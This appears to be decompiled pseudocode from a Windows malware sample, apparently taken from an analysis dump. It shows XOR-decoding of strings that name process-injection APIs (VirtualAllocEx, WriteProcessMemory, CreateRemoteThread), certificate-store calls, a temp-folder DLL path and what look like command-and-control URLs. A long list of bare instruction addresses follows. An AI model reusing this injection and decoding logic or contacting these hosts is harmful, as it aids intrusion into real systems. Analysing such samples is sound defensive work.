					_t96 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t96 + "https22.ttf") =  *(_t96 + "https22.ttf") ^ 0x0000002a;
						_t96 = _t96 + 1;
					} while (_t96 < 0xb);
					asm("movups xmm0, [0x3eb90c]");
					 *"ja001" =  *"ja001" ^ 0x0000002a;
					_t97 = 0x20;
					 *0x3eba19 =  *0x3eba19 ^ 0x0000002a;
					 *0x3eba1a =  *0x3eba1a ^ 0x0000002a;
					asm("pxor xmm0, xmm2");
					 *0x3eba1b =  *0x3eba1b ^ 0x0000002a;
					 *0x3eba1c =  *0x3eba1c ^ 0x0000002a;
					 *"ja002" =  *"ja002" ^ 0x0000002a;
					 *0x3eb811 =  *0x3eb811 ^ 0x0000002a;
					 *0x3eb812 =  *0x3eb812 ^ 0x0000002a;
					 *0x3eb813 =  *0x3eb813 ^ 0x0000002a;
					 *0x3eb814 =  *0x3eb814 ^ 0x0000002a;
					 *"ja003" =  *"ja003" ^ 0x0000002a;
					 *0x3eb7c9 =  *0x3eb7c9 ^ 0x0000002a;
					 *0x3eb7ca =  *0x3eb7ca ^ 0x0000002a;
					 *0x3eb7cb =  *0x3eb7cb ^ 0x0000002a;
					 *0x3eb7cc =  *0x3eb7cc ^ 0x0000002a;
					"server.crt" = "server.crt" ^ 0x0000002a;
					M003EB7D1 = M003EB7D1 ^ 0x0000002a;
					M003EB7D2 = M003EB7D2 ^ 0x0000002a;
					M003EB7D3 = M003EB7D3 ^ 0x0000002a;
					M003EB7D4 = M003EB7D4 ^ 0x0000002a;
					 *0x3eb7d5 =  *0x3eb7d5 ^ 0x0000002a;
					 *0x3eb7d6 =  *0x3eb7d6 ^ 0x0000002a;
					 *0x3eb7d7 =  *0x3eb7d7 ^ 0x0000002a;
					 *0x3eb7d8 =  *0x3eb7d8 ^ 0x0000002a;
					 *0x3eb7d9 =  *0x3eb7d9 ^ 0x0000002a;
					"server.key" = "server.key" ^ 0x0000002a;
					M003EB73D = M003EB73D ^ 0x0000002a;
					M003EB73E = M003EB73E ^ 0x0000002a;
					M003EB73F = M003EB73F ^ 0x0000002a;
					M003EB740 = M003EB740 ^ 0x0000002a;
					 *0x3eb741 =  *0x3eb741 ^ 0x0000002a;
					 *0x3eb742 =  *0x3eb742 ^ 0x0000002a;
					 *0x3eb743 =  *0x3eb743 ^ 0x0000002a;
					 *0x3eb744 =  *0x3eb744 ^ 0x0000002a;
					 *0x3eb745 =  *0x3eb745 ^ 0x0000002a;
					"server.der" = "server.der" ^ 0x0000002a;
					M003EB731 = M003EB731 ^ 0x0000002a;
					M003EB732 = M003EB732 ^ 0x0000002a;
					M003EB733 = M003EB733 ^ 0x0000002a;
					M003EB734 = M003EB734 ^ 0x0000002a;
					 *0x3eb735 =  *0x3eb735 ^ 0x0000002a;
					 *0x3eb736 =  *0x3eb736 ^ 0x0000002a;
					 *0x3eb737 =  *0x3eb737 ^ 0x0000002a;
					 *0x3eb738 =  *0x3eb738 ^ 0x0000002a;
					 *0x3eb739 =  *0x3eb739 ^ 0x0000002a;
					asm("movups [0x3eb90c], xmm0");
					 *0x3eb6c3 = 0;
					asm("movups xmm0, [0x3eb91c]");
					 *0x3eba1d = 0;
					 *0x3eb815 = 0;
					asm("pxor xmm0, xmm2");
					 *0x3eb7cd = 0;
					 *0x3eb7da = 0;
					 *0x3eb746 = 0;
					 *0x3eb73a = 0;
					asm("movups [0x3eb91c], xmm0");
					do {
						 *(_t97 + "Global\\55644A24E6234CD6B989BEAA7D8725B0") =  *(_t97 + "Global\\55644A24E6234CD6B989BEAA7D8725B0") ^ 0x0000002a;
						_t97 = _t97 + 1;
					} while (_t97 < 0x27);
					asm("movups xmm0, [0x3eb6fc]");
					 *0x3eb933 = 0;
					_t98 = 0x20;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb6fc], xmm0");
					asm("movups xmm0, [0x3eb70c]");
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb70c], xmm0");
					do {
						 *(_t98 + "5B7C84755D8041139A7AEBA6F4E5912F.dat") =  *(_t98 + "5B7C84755D8041139A7AEBA6F4E5912F.dat") ^ 0x0000002a;
						_t98 = _t98 + 1;
					} while (_t98 < 0x24);
					 *0x3eb720 = 0;
					_t99 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t99 + "vmware24A.dat") =  *(_t99 + "vmware24A.dat") ^ 0x0000002a;
						_t99 = _t99 + 1;
					} while (_t99 < 0xd);
					asm("movups xmm0, [0x3eb878]");
					 *0x3eb999 = 0;
					_t100 = 0x10;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb878], xmm0");
					do {
						 *(_t100 + "/apiplay/H_S_Timing/report") =  *(_t100 + "/apiplay/H_S_Timing/report") ^ 0x0000002a;
						_t100 = _t100 + 1;
					} while (_t100 < 0x1a);
					asm("movups xmm0, [0x3eb604]");
					 *0x3eb892 = 0;
					_t101 = 0x10;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb604], xmm0");
					do {
						 *(_t101 + "c:\\windows\\temp\\winaudio.dll") =  *(_t101 + "c:\\windows\\temp\\winaudio.dll") ^ 0x0000002a;
						_t101 = _t101 + 1;
					} while (_t101 < 0x1c);
					asm("movups xmm0, [0x3eb8c8]");
					"127.0.0.1" = "127.0.0.1" ^ 0x0000002a;
					_t102 = 0x10;
					M003EB5D5 = M003EB5D5 ^ 0x0000002a;
					M003EB5D6 = M003EB5D6 ^ 0x0000002a;
					asm("pxor xmm0, xmm2");
					M003EB5D7 = M003EB5D7 ^ 0x0000002a;
					 *0x3eb5d8 =  *0x3eb5d8 ^ 0x0000002a;
					 *0x3eb5d9 =  *0x3eb5d9 ^ 0x0000002a;
					 *0x3eb5da =  *0x3eb5da ^ 0x0000002a;
					 *0x3eb5db =  *0x3eb5db ^ 0x0000002a;
					 *0x3eb5dc =  *0x3eb5dc ^ 0x0000002a;
					"Host" = "Host" ^ 0x0000002a;
					 *0x3eb9f9 =  *0x3eb9f9 ^ 0x0000002a;
					 *0x3eb9fa =  *0x3eb9fa ^ 0x0000002a;
					 *0x3eb9fb =  *0x3eb9fb ^ 0x0000002a;
					 *0x3eb620 = 0;
					 *0x3eb5dd = 0;
					 *0x3eb9fc = 0;
					asm("movups [0x3eb8c8], xmm0");
					do {
						 *(_t102 + "from client request") =  *(_t102 + "from client request") ^ 0x0000002a;
						_t102 = _t102 + 1;
					} while (_t102 < 0x13);
					asm("movups xmm0, [0x3eb99c]");
					 *0x3eb8db = 0;
					_t103 = 0x10;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb99c], xmm0");
					do {
						 *(_t103 + "from server response") =  *(_t103 + "from server response") ^ 0x0000002a;
						_t103 = _t103 + 1;
					} while (_t103 < 0x14);
					 *0x3eb9b0 = 0;
					_t104 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t104 + "Kernel32.dll") =  *(_t104 + "Kernel32.dll") ^ 0x0000002a;
						_t104 = _t104 + 1;
					} while (_t104 < 0xc);
					 *0x3eb67c = 0;
					_t105 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t105 + "LoadLibraryA") =  *(_t105 + "LoadLibraryA") ^ 0x0000002a;
						_t105 = _t105 + 1;
					} while (_t105 < 0xc);
					asm("movups xmm0, [0x3eb654]");
					 *0x3eb6d8 = 0;
					_t106 = 0x10;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb654], xmm0");
					do {
						 *(_t106 + "\\VarFileInfo\\Translation") =  *(_t106 + "\\VarFileInfo\\Translation") ^ 0x0000002a;
						_t106 = _t106 + 1;
					} while (_t106 < 0x18);
					asm("movups xmm0, [0x3eb7dc]");
					 *0x3eb66c = 0;
					_t107 = 0;
					 *0x3eb7ec = 0;
					asm("pxor xmm0, xmm2");
					 *0x3eb800 = 0;
					asm("movups [0x3eb7dc], xmm0");
					 *0x3eb5f0 = 0;
					asm("movups xmm0, [0x3eb7f0]");
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb7f0], xmm0");
					asm("movups xmm0, [0x3eb5e0]");
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb5e0], xmm0");
					do {
						 *(_t107 + "30ok.net.cn") =  *(_t107 + "30ok.net.cn") ^ 0x0000002a;
						_t107 = _t107 + 1;
					} while (_t107 < 0xb);
					asm("movups xmm0, [0x3eba00]");
					".cn" = ".cn" ^ 0x0000002a;
					_t108 = 0x10;
					 *0x3eb8ed =  *0x3eb8ed ^ 0x0000002a;
					 *0x3eb8ee =  *0x3eb8ee ^ 0x0000002a;
					asm("pxor xmm0, xmm2");
					"com" = "com" ^ 0x0000002a;
					 *0x3eb8c5 =  *0x3eb8c5 ^ 0x0000002a;
					 *0x3eb8c6 =  *0x3eb8c6 ^ 0x0000002a;
					"net" = "net" ^ 0x0000002a;
					 *0x3eb961 =  *0x3eb961 ^ 0x0000002a;
					 *0x3eb962 =  *0x3eb962 ^ 0x0000002a;
					"*.com.cn" = "*.com.cn" ^ 0x0000002a;
					M003EB725 = M003EB725 ^ 0x0000002a;
					M003EB726 = M003EB726 ^ 0x0000002a;
					 *0x3eb727 =  *0x3eb727 ^ 0x0000002a;
					 *0x3eb728 =  *0x3eb728 ^ 0x0000002a;
					 *0x3eb729 =  *0x3eb729 ^ 0x0000002a;
					 *0x3eb72a =  *0x3eb72a ^ 0x0000002a;
					 *0x3eb72b =  *0x3eb72b ^ 0x0000002a;
					"*.net.cn" = "*.net.cn" ^ 0x0000002a;
					M003EB69D = M003EB69D ^ 0x0000002a;
					M003EB69E = M003EB69E ^ 0x0000002a;
					 *0x3eb69f =  *0x3eb69f ^ 0x0000002a;
					 *0x3eb6a0 =  *0x3eb6a0 ^ 0x0000002a;
					 *0x3eb6a1 =  *0x3eb6a1 ^ 0x0000002a;
					 *0x3eb6a2 =  *0x3eb6a2 ^ 0x0000002a;
					 *0x3eb6a3 =  *0x3eb6a3 ^ 0x0000002a;
					 *0x3eb9d3 = 0;
					 *0x3eb8ef = 0;
					 *0x3eb8c7 = 0;
					 *0x3eb963 = 0;
					 *0x3eb72c = 0;
					 *0x3eb6a4 = 0;
					asm("movups [0x3eba00], xmm0");
					do {
						 *(_t108 + "DNS.%d:*.%s,DNS.%d:%s,") =  *(_t108 + "DNS.%d:*.%s,DNS.%d:%s,") ^ 0x0000002a;
						_t108 = _t108 + 1;
					} while (_t108 < 0x16);
					asm("movups xmm0, [0x3eba20]");
					 *0x3eba16 = 0;
					_t109 = 0x10;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eba20], xmm0");
					do {
						 *(_t109 + "C:\\Windows\\Temp\\%s") =  *(_t109 + "C:\\Windows\\Temp\\%s") ^ 0x0000002a;
						_t109 = _t109 + 1;
					} while (_t109 < 0x12);
					"Console" = "Console" ^ 0x0000002a;
					M003EB681 = M003EB681 ^ 0x0000002a;
					 *0x3eb682 =  *0x3eb682 ^ 0x0000002a;
					 *0x3eb683 =  *0x3eb683 ^ 0x0000002a;
					 *0x3eb684 =  *0x3eb684 ^ 0x0000002a;
					 *0x3eb685 =  *0x3eb685 ^ 0x0000002a;
					 *0x3eb686 =  *0x3eb686 ^ 0x0000002a;
					"WindowTag" = "WindowTag" ^ 0x0000002a;
					M003EB625 = M003EB625 ^ 0x0000002a;
					M003EB626 = M003EB626 ^ 0x0000002a;
					M003EB627 = M003EB627 ^ 0x0000002a;
					 *0x3eb628 =  *0x3eb628 ^ 0x0000002a;
					 *0x3eb629 =  *0x3eb629 ^ 0x0000002a;
					 *0x3eb62a =  *0x3eb62a ^ 0x0000002a;
					 *0x3eb62b =  *0x3eb62b ^ 0x0000002a;
					 *0x3eb62c =  *0x3eb62c ^ 0x0000002a;
					_t110 = 0;
					 *0x3eba32 = 0;
					 *0x3eb687 = 0;
					 *0x3eb62d = 0;
					do {
						 *(_t110 + "www.2345.com") =  *(_t110 + "www.2345.com") ^ 0x0000002a;
						_t110 = _t110 + 1;
					} while (_t110 < 0xc);
					asm("movups xmm0, [0x3eb75c]");
					"20210720" = "20210720" ^ 0x0000002a;
					M003EB749 = M003EB749 ^ 0x0000002a;
					M003EB74A = M003EB74A ^ 0x0000002a;
					asm("pxor xmm0, xmm2");
					 *0x3eb74b =  *0x3eb74b ^ 0x0000002a;
					 *0x3eb74c =  *0x3eb74c ^ 0x0000002a;
					 *0x3eb74d =  *0x3eb74d ^ 0x0000002a;
					 *0x3eb74e =  *0x3eb74e ^ 0x0000002a;
					 *0x3eb74f =  *0x3eb74f ^ 0x0000002a;
					_t111 = 0;
					 *0x3eb5c0 = 0;
					asm("movups [0x3eb75c], xmm0");
					 *0x3eb76c = 0;
					 *0x3eb750 = 0;
					do {
						 *(_t111 + "OpenProcess") =  *(_t111 + "OpenProcess") ^ 0x0000002a;
						_t111 = _t111 + 1;
					} while (_t111 < 0xb);
					 *0x3eb80f = 0;
					_t112 = 0;
					do {
						 *(_t112 + "VirtualAllocEx") =  *(_t112 + "VirtualAllocEx") ^ 0x0000002a;
						_t112 = _t112 + 1;
					} while (_t112 < 0xe);
					asm("movups xmm0, [0x3eb9d4]");
					 *0x3eb852 = 0;
					_t113 = 0x10;
					asm("pxor xmm0, xmm2");
					asm("movups [0x3eb9d4], xmm0");
					do {
						 *(_t113 + "WriteProcessMemory") =  *(_t113 + "WriteProcessMemory") ^ 0x0000002a;
						_t113 = _t113 + 1;
					} while (_t113 < 0x12);
					asm("movups xmm0, [0x3eba5c]");
					 *0x3eb9e6 = 0;
					_t114 = 0x10;
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eba5c], xmm1");
					do {
						 *(_t114 + "CreateRemoteThread") =  *(_t114 + "CreateRemoteThread") ^ 0x0000002a;
						_t114 = _t114 + 1;
					} while (_t114 < 0x12);
					asm("movups xmm0, [0x3eb944]");
					 *0x3eba6e = 0;
					_t115 = 0x10;
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb944], xmm1");
					do {
						 *(_t115 + "WaitForSingleObject") =  *(_t115 + "WaitForSingleObject") ^ 0x0000002a;
						_t115 = _t115 + 1;
					} while (_t115 < 0x13);
					 *0x3eb957 = 0;
					_t116 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t116 + "VirtualFreeEx") =  *(_t116 + "VirtualFreeEx") ^ 0x0000002a;
						_t116 = _t116 + 1;
					} while (_t116 < 0xd);
					 *0x3eb6b5 = 0;
					_t117 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t117 + "IsWow64Process") =  *(_t117 + "IsWow64Process") ^ 0x0000002a;
						_t117 = _t117 + 1;
					} while (_t117 < 0xe);
					 *0x3eb9f6 = 0;
					_t118 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t118 + "Process32First") =  *(_t118 + "Process32First") ^ 0x0000002a;
						_t118 = _t118 + 1;
					} while (_t118 < 0xe);
					 *0x3eb942 = 0;
					_t119 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t119 + "Process32Next") =  *(_t119 + "Process32Next") ^ 0x0000002a;
						_t119 = _t119 + 1;
					} while (_t119 < 0xd);
					 *0x3eb8b9 = 0;
					_t120 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t120 + "UnmapViewOfFile") =  *(_t120 + "UnmapViewOfFile") ^ 0x0000002a;
						_t120 = _t120 + 1;
					} while (_t120 < 0xf);
					asm("movups xmm0, [0x3eb818]");
					 *0x3eb603 = 0;
					_t121 = 0x10;
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb818], xmm1");
					do {
						 *(_t121 + "CreateFileMappingA") =  *(_t121 + "CreateFileMappingA") ^ 0x0000002a;
						_t121 = _t121 + 1;
					} while (_t121 < 0x12);
					 *0x3eb82a = 0;
					_t122 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t122 + "MapViewOfFile") =  *(_t122 + "MapViewOfFile") ^ 0x0000002a;
						_t122 = _t122 + 1;
					} while (_t122 < 0xd);
					 *0x3eb63d = 0;
					_t123 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t123 + "FlushViewOfFile") =  *(_t123 + "FlushViewOfFile") ^ 0x0000002a;
						_t123 = _t123 + 1;
					} while (_t123 < 0xf);
					asm("movups xmm0, [0x3eb688]");
					 *0x3eb8eb = 0;
					_t124 = 0;
					asm("movaps xmm1, xmm2");
					 *0x3eb698 = 0;
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb688], xmm1");
					do {
						 *(_t124 + "crypt32.dll") =  *(_t124 + "crypt32.dll") ^ 0x0000002a;
						_t124 = _t124 + 1;
					} while (_t124 < 0xb);
					 *0x3eb5a3 = 0;
					_t125 = 0;
					do {
						 *(_t125 + "CertOpenStore") =  *(_t125 + "CertOpenStore") ^ 0x0000002a;
						_t125 = _t125 + 1;
					} while (_t125 < 0xd);
					 *0x3eb569 = 0;
					_t126 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t126 + "CertCloseStore") =  *(_t126 + "CertCloseStore") ^ 0x0000002a;
						_t126 = _t126 + 1;
					} while (_t126 < 0xe);
					asm("movups xmm0, [0x3eb794]");
					 *0x3eb57a = 0;
					_t127 = 0x10;
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb794], xmm1");
					do {
						 *(_t127 + "xxx.xxxxxxxxxx.xxx") =  *(_t127 + "xxx.xxxxxxxxxx.xxx") ^ 0x0000002a;
						_t127 = _t127 + 1;
					} while (_t127 < 0x12);
					 *0x3eb7a6 = 0;
					_t128 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t128 + "201225024508Z") =  *(_t128 + "201225024508Z") ^ 0x0000002a;
						_t128 = _t128 + 1;
					} while (_t128 < 0xd);
					 *0x3eb5b1 = 0;
					_t129 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t129 + "251225024508Z") =  *(_t129 + "251225024508Z") ^ 0x0000002a;
						_t129 = _t129 + 1;
					} while (_t129 < 0xd);
					asm("movups xmm0, [0x3eb964]");
					 *0x3eb5d1 = 0;
					_t130 = 0x20;
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups xmm0, [0x3eb974]");
					asm("movups [0x3eb964], xmm1");
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb974], xmm1");
					do {
						 *(_t130 + "{abababab-baba-abab-baba-ecf4bb862ded}") =  *(_t130 + "{abababab-baba-abab-baba-ecf4bb862ded}") ^ 0x0000002a;
						_t130 = _t130 + 1;
					} while (_t130 < 0x26);
					asm("movups xmm0, [0x3eb7a8]");
					 *0x3eb98a = 0;
					_t131 = 0x10;
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb7a8], xmm1");
					do {
						 *(_t131 + "%02X-%02X-%02X-%02X-%02X-%02X") =  *(_t131 + "%02X-%02X-%02X-%02X-%02X-%02X") ^ 0x0000002a;
						_t131 = _t131 + 1;
					} while (_t131 < 0x1d);
					asm("movups xmm0, [0x3eb854]");
					 *0x3eb7c5 = 0;
					_t132 = 0x10;
					asm("movaps xmm1, xmm2");
					 *0x3eb874 = 0;
					asm("pxor xmm1, xmm0");
					asm("movups xmm0, [0x3eb864]");
					asm("movups [0x3eb854], xmm1");
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups xmm0, [0x3eb640]");
					asm("movups [0x3eb864], xmm1");
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb640], xmm1");
					do {
						 *(_t132 + "Software\\Licenses") =  *(_t132 + "Software\\Licenses") ^ 0x0000002a;
						_t132 = _t132 + 1;
					} while (_t132 < 0x11);
					asm("movups xmm0, [0x3eb894]");
					 *0x3eb651 = 0;
					_t133 = 0x10;
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb894], xmm1");
					do {
						 *(_t133 + "{Z3CD-FA87-B5E6-0SYI}") =  *(_t133 + "{Z3CD-FA87-B5E6-0SYI}") ^ 0x0000002a;
						_t133 = _t133 + 1;
					} while (_t133 < 0x15);
					asm("movups xmm0, [0x3eb82c]");
					"GET " = "GET " ^ 0x0000002a;
					_t134 = 0x10;
					 *0x3eb6c5 =  *0x3eb6c5 ^ 0x0000002a;
					asm("movaps xmm1, xmm2");
					 *0x3eb6c6 =  *0x3eb6c6 ^ 0x0000002a;
					asm("pxor xmm1, xmm0");
					 *0x3eb6c7 =  *0x3eb6c7 ^ 0x0000002a;
					 *"POST " =  *"POST " ^ 0x0000002a;
					 *0x3eb8bd =  *0x3eb8bd ^ 0x0000002a;
					 *0x3eb8be =  *0x3eb8be ^ 0x0000002a;
					 *0x3eb8bf =  *0x3eb8bf ^ 0x0000002a;
					 *0x3eb8c0 =  *0x3eb8c0 ^ 0x0000002a;
					 *" HTTP" =  *" HTTP" ^ 0x0000002a;
					 *0x3eb959 =  *0x3eb959 ^ 0x0000002a;
					 *0x3eb95a =  *0x3eb95a ^ 0x0000002a;
					 *0x3eb95b =  *0x3eb95b ^ 0x0000002a;
					 *0x3eb95c =  *0x3eb95c ^ 0x0000002a;
					"Referer" = "Referer" ^ 0x0000002a;
					M003EB755 = M003EB755 ^ 0x0000002a;
					 *0x3eb756 =  *0x3eb756 ^ 0x0000002a;
					 *0x3eb757 =  *0x3eb757 ^ 0x0000002a;
					 *0x3eb758 =  *0x3eb758 ^ 0x0000002a;
					 *0x3eb759 =  *0x3eb759 ^ 0x0000002a;
					 *0x3eb75a =  *0x3eb75a ^ 0x0000002a;
					 *0x3eb8a9 = 0;
					 *0x3eb6c8 = 0;
					 *0x3eb8c1 = 0;
					 *0x3eb95d = 0;
					 *0x3eb75b = 0;
					asm("movups [0x3eb82c], xmm1");
					do {
						 *(_t134 + "/apiplay/Cept_Sp/report") =  *(_t134 + "/apiplay/Cept_Sp/report") ^ 0x0000002a;
						_t134 = _t134 + 1;
					} while (_t134 < 0x17);
					asm("movups xmm0, [0x3eb9b4]");
					 *0x3eb843 = 0;
					_t135 = 0x10;
					asm("movaps xmm1, xmm2");
					 *0x3eb9c4 = 0;
					asm("pxor xmm1, xmm0");
					 *0x3eb790 = 0;
					asm("movups xmm0, [0x3eb770]");
					asm("movups [0x3eb9b4], xmm1");
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups xmm0, [0x3eb780]");
					asm("movups [0x3eb770], xmm1");
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups xmm0, [0x3eb6dc]");
					asm("movups [0x3eb780], xmm1");
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups [0x3eb6dc], xmm1");
					do {
						 *(_t135 + "http://41ku.cn:10100/plusxyzs") =  *(_t135 + "http://41ku.cn:10100/plusxyzs") ^ 0x0000002a;
						_t135 = _t135 + 1;
					} while (_t135 < 0x1d);
					asm("movups xmm0, [0x3eba34]");
					 *0x3eb6f9 = 0;
					_t136 = 0x20;
					asm("movaps xmm1, xmm2");
					asm("pxor xmm1, xmm0");
					asm("movups xmm0, [0x3eba44]");
					asm("movups [0x3eba34], xmm1");
					asm("pxor xmm2, xmm0");
					asm("movups [0x3eba44], xmm2");
					do {
						 *(_t136 + "http://gmt.yunliao8.com:10100/plusxyzs") =  *(_t136 + "http://gmt.yunliao8.com:10100/plusxyzs") ^ 0x0000002a;
						_t136 = _t136 + 1;
					} while (_t136 < 0x26);
					 *0x3eba5a = 0;
					 *0x3f0834 = 1;
					return _t136;
				}
				return _t91;
			}

















































                        0x002d2867
                        0x002d286d
                        0x002d2874
                        0x002d2879
                        0x002d2880
                        0x002d2884
                        0x002d2890
                        0x002d2890
                        0x002d2897
                        0x002d2898
                        0x002d289d
                        0x002d28a4
                        0x002d28ab
                        0x002d28b0
                        0x002d28b4
                        0x002d28c0
                        0x002d28c0
                        0x002d28c7
                        0x002d28c8
                        0x002d28cd
                        0x002d28d4
                        0x002d28db
                        0x002d28e0
                        0x002d28e7
                        0x002d28eb
                        0x002d28f2
                        0x002d28f9
                        0x002d28fd
                        0x002d2904
                        0x002d290b
                        0x002d290f
                        0x002d2916
                        0x002d2920
                        0x002d2920
                        0x002d2927
                        0x002d2928
                        0x002d292d
                        0x002d2934
                        0x002d2936
                        0x002d2940
                        0x002d2940
                        0x002d2947
                        0x002d2948
                        0x002d294d
                        0x002d2954
                        0x002d2956
                        0x002d2960
                        0x002d2960
                        0x002d2967
                        0x002d2968
                        0x002d296d
                        0x002d2974
                        0x002d297b
                        0x002d2980
                        0x002d2987
                        0x002d298e
                        0x002d2992
                        0x002d2999
                        0x002d29a0
                        0x002d29a7
                        0x002d29ae
                        0x002d29b5
                        0x002d29bc
                        0x002d29c3
                        0x002d29ca
                        0x002d29d1
                        0x002d29d8
                        0x002d29df
                        0x002d29e6
                        0x002d29ed
                        0x002d29f4
                        0x002d29fb
                        0x002d2a02
                        0x002d2a09
                        0x002d2a10
                        0x002d2a17
                        0x002d2a1e
                        0x002d2a25
                        0x002d2a2c
                        0x002d2a33
                        0x002d2a3a
                        0x002d2a41
                        0x002d2a48
                        0x002d2a4f
                        0x002d2a56
                        0x002d2a5d
                        0x002d2a64
                        0x002d2a6b
                        0x002d2a72
                        0x002d2a79
                        0x002d2a80
                        0x002d2a87
                        0x002d2a8e
                        0x002d2a95
                        0x002d2a9c
                        0x002d2aa3
                        0x002d2aaa
                        0x002d2ab1
                        0x002d2ab8
                        0x002d2abf
                        0x002d2ac6
                        0x002d2acd
                        0x002d2ad4
                        0x002d2adb
                        0x002d2adf
                        0x002d2ae6
                        0x002d2aed
                        0x002d2af4
                        0x002d2afb
                        0x002d2b02
                        0x002d2b02
                        0x002d2b09
                        0x002d2b0a
                        0x002d2b0f
                        0x002d2b16
                        0x002d2b1d
                        0x002d2b22
                        0x002d2b26
                        0x002d2b2d
                        0x002d2b34
                        0x002d2b38
                        0x002d2b40
                        0x002d2b40
                        0x002d2b47
                        0x002d2b48
                        0x002d2b4d
                        0x002d2b54
                        0x002d2b56
                        0x002d2b60
                        0x002d2b60
                        0x002d2b67
                        0x002d2b68
                        0x002d2b6d
                        0x002d2b74
                        0x002d2b7b
                        0x002d2b80
                        0x002d2b84
                        0x002d2b90
                        0x002d2b90
                        0x002d2b97
                        0x002d2b98
                        0x002d2b9d
                        0x002d2ba4
                        0x002d2bab
                        0x002d2bb0
                        0x002d2bb4
                        0x002d2bc0
                        0x002d2bc0
                        0x002d2bc7
                        0x002d2bc8
                        0x002d2bcd
                        0x002d2bd4
                        0x002d2bdb
                        0x002d2be0
                        0x002d2be7
                        0x002d2bee
                        0x002d2bf2
                        0x002d2bf9
                        0x002d2c00
                        0x002d2c07
                        0x002d2c0e
                        0x002d2c15
                        0x002d2c1c
                        0x002d2c23
                        0x002d2c2a
                        0x002d2c31
                        0x002d2c38
                        0x002d2c3f
                        0x002d2c46
                        0x002d2c4d
                        0x002d2c54
                        0x002d2c54
                        0x002d2c5b
                        0x002d2c5c
                        0x002d2c61
                        0x002d2c68
                        0x002d2c6f
                        0x002d2c74
                        0x002d2c78
                        0x002d2c80
                        0x002d2c80
                        0x002d2c87
                        0x002d2c88
                        0x002d2c8d
                        0x002d2c94
                        0x002d2c96
                        0x002d2ca0
                        0x002d2ca0
                        0x002d2ca7
                        0x002d2ca8
                        0x002d2cad
                        0x002d2cb4
                        0x002d2cb6
                        0x002d2cc0
                        0x002d2cc0
                        0x002d2cc7
                        0x002d2cc8
                        0x002d2ccd
                        0x002d2cd4
                        0x002d2cdb
                        0x002d2ce0
                        0x002d2ce4
                        0x002d2cf0
                        0x002d2cf0
                        0x002d2cf7
                        0x002d2cf8
                        0x002d2cfd
                        0x002d2d04
                        0x002d2d0b
                        0x002d2d0d
                        0x002d2d14
                        0x002d2d18
                        0x002d2d1f
                        0x002d2d26
                        0x002d2d2d
                        0x002d2d34
                        0x002d2d38
                        0x002d2d3f
                        0x002d2d46
                        0x002d2d4a
                        0x002d2d51
                        0x002d2d51
                        0x002d2d58
                        0x002d2d59
                        0x002d2d5e
                        0x002d2d65
                        0x002d2d6c
                        0x002d2d71
                        0x002d2d78
                        0x002d2d7f
                        0x002d2d83
                        0x002d2d8a
                        0x002d2d91
                        0x002d2d98
                        0x002d2d9f
                        0x002d2da6
                        0x002d2dad
                        0x002d2db4
                        0x002d2dbb
                        0x002d2dc2
                        0x002d2dc9
                        0x002d2dd0
                        0x002d2dd7
                        0x002d2dde
                        0x002d2de5
                        0x002d2dec
                        0x002d2df3
                        0x002d2dfa
                        0x002d2e01
                        0x002d2e08
                        0x002d2e0f
                        0x002d2e16
                        0x002d2e1d
                        0x002d2e24
                        0x002d2e2b
                        0x002d2e32
                        0x002d2e39
                        0x002d2e40
                        0x002d2e47
                        0x002d2e50
                        0x002d2e50
                        0x002d2e57
                        0x002d2e58
                        0x002d2e5d
                        0x002d2e64
                        0x002d2e6b
                        0x002d2e70
                        0x002d2e74
                        0x002d2e80
                        0x002d2e80
                        0x002d2e87
                        0x002d2e88
                        0x002d2e8d
                        0x002d2e94
                        0x002d2e9b
                        0x002d2ea2
                        0x002d2ea9
                        0x002d2eb0
                        0x002d2eb7
                        0x002d2ebe
                        0x002d2ec5
                        0x002d2ecc
                        0x002d2ed3
                        0x002d2eda
                        0x002d2ee1
                        0x002d2ee8
                        0x002d2eef
                        0x002d2ef6
                        0x002d2efd
                        0x002d2eff
                        0x002d2f06
                        0x002d2f0d
                        0x002d2f14
                        0x002d2f14
                        0x002d2f1b
                        0x002d2f1c
                        0x002d2f21
                        0x002d2f28
                        0x002d2f2f
                        0x002d2f36
